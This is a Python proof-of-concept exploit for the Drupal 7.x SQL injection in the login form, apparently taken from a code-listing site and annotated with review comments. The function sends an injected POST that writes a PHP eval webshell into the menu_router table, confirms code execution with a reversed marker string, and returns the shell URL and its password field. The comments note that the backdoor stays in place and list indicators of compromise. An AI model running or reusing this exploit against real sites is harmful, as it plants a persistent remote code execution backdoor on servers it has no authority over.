def exploit(cls, args):
    """Proof-of-concept check for the Drupal SQL injection named in the listing's title.

    Sends one POST whose ``name`` array key carries an SQL statement, then
    requests the path that statement registers and looks for a marker string
    in the reply. ``cls`` is not used in the body.

    Args:
        args: dict read for ``args['options']['target']`` (base URL) and
            ``args['options']['verbose']``. ``args['success']`` is always
            written; on a hit three ``args['poc_ret']`` entries are written.

    Returns:
        The same ``args`` dict, with ``success`` set to True or False.

    Review notes:
        * The published listing lost its indentation; the nesting below is
          reconstructed from the statement order -- confirm against the
          original file.
        * This is not a read-only check. The first request asks the database
          to insert a row into ``menu_router`` and nothing here removes it,
          so after a positive result the row stays until someone deletes it.
        * Indicators visible in this code: a POST parameter name starting
          with ``name[0;``, a ``q=`` value containing ``<?php``, and a
          ``menu_router`` row whose ``page_callback`` is ``php_eval``.
        * No exception handling or timeout is set; ``urllib2.urlopen`` raises
          on connection failures and HTTP error statuses, so the caller gets
          the exception rather than ``success = False``.
    """
    url = args['options']['target']
    # The path requested in step 2. It is the same string the SQL below stores
    # in menu_router.path; the base64 text decodes to a PHP eval of the POST
    # field "e".
    webshell_url = url + '/?q=<?php%20eval(base64_decode(ZXZhbCgkX1BPU1RbZV0pOw));?>'
    # Form-encoded login-block submission (form_id=user_login_block). The SQL
    # sits in the array key of "name", not in a value; the trailing "#" comments
    # out whatever the server appends after it. The inserted row names
    # page_callback 'php_eval' from modules/php/php.module with
    # access_callback '1' -- presumably making the route callable without a
    # login; confirm against Drupal's menu access handling.
    payload = "name[0;insert into menu_router (path, page_callback, access_callback, " \
        "include_file, load_functions, to_arg_functions, description) values ('<" \
        "?php eval(base64_decode(ZXZhbCgkX1BPU1RbZV0pOw));?>','php_eval', '1', '" \
        "modules/php/php.module', '', '', '');#]=test&name[0]=test2&pass=test&fo" \
        "rm_id=user_login_block"
    if args['options']['verbose']:
        print '[*] Request URL: ' + url
        print '[*] POST Content: ' + payload
    # Step 1: passing data= makes this a POST. The response is discarded, so a
    # failed injection is only noticed in step 2.
    urllib2.urlopen(url, data=payload)
    # Step 2: call the registered path and have it echo a reversed marker.
    request = urllib2.Request(webshell_url, data="e=echo strrev(gwesdvjvncqwdijqiwdqwduhq);")
    response = urllib2.urlopen(request).read()
    # The reversed marker appears only if the server executed strrev(); a page
    # that merely reflects the request body would contain the forward string.
    if 'gwesdvjvncqwdijqiwdqwduhq'[::-1] in response:
        args['success'] = True
        args['poc_ret']['vul_url'] = url
        args['poc_ret']['Webshell'] = webshell_url
        # 'e' is the POST field name the planted code evaluates.
        args['poc_ret']['Webshell_PWD'] = 'e'
        return args
    args['success'] = False
    return args
Drupal 7.31 GetShell via includes_database_database.inc SQL Injection Exploit.py 文件源码
python